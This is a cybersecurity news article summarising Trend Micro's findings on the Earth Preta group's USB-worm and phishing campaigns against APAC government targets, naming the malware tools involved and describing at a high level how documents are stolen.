Earth Preta Escalates APAC Attacks with New Malware

The hacker group Earth Preta has intensified its campaigns against government institutions in the Asia-Pacific region (APAC). According to Trend Micro, the attackers have refined their attack methods and deployed new malware.

One of the key tools in these attacks is a modified version of the HIUPAN worm, which spreads via removable media. The worm introduces the primary malware, PUBLOAD, which allows the attackers to control infected devices and execute commands to collect and transmit data to their servers.

In the latest infection scheme, HIUPAN initiates the attack by transferring malicious files to removable drives. Once the drive is connected to a new device, the worm discreetly infects it, concealing its files from the user. The latest version of HIUPAN is notable for its simplified configuration and enhanced management of its spread. The malicious code is stored in the ProgramData directory, making it more difficult to detect.

The main objective of the PUBLOAD program is to gather system information and perform network mapping. The malware executes commands to identify active processes, network connections, and device configurations. To achieve these tasks, PUBLOAD uses both standard Windows utilities and its own tools for data exfiltration.

In addition to the HIUPAN worm and PUBLOAD, two additional tools were employed in the new attack. FDMTP is a simple downloader that uses encryption to evade antivirus detection, while PTSOCKET facilitates the transfer of files to remote servers using a multithreaded mode, accelerating the data exfiltration process.

The attackers’ primary goal is to collect documents in various formats, including .doc, .xls, .pdf, and .ppt. Once collected, the files are archived using the RAR program and transferred via cURL commands to Earth Preta’s servers. If cURL is not employed, PTSOCKET is used for data transmission.

Recent attacks have also included phishing campaigns. The hackers sent victims emails containing malicious links that led to the download of the DOWNBAIT loader, which subsequently delivered and executed the PlugX backdoor, ensuring long-term access to the victim’s system.

Based on the analysis of phishing emails and decoy documents, it was determined that Earth Preta primarily targeted government institutions and entities associated with defense, foreign policy, and education across APAC countries. Victims included organizations from Myanmar, the Philippines, Vietnam, Singapore, Cambodia, and Taiwan.

Earth Preta continues to enhance its tools and attack methods, making its threat particularly relevant to governmental and corporate entities in the APAC region. The use of removable media for malware distribution, phishing emails for initial payload delivery, and new data exfiltration techniques all point to the group’s high level of adaptability. Cybersecurity professionals must remain vigilant and actively update their defenses to counter new Earth Preta attacks.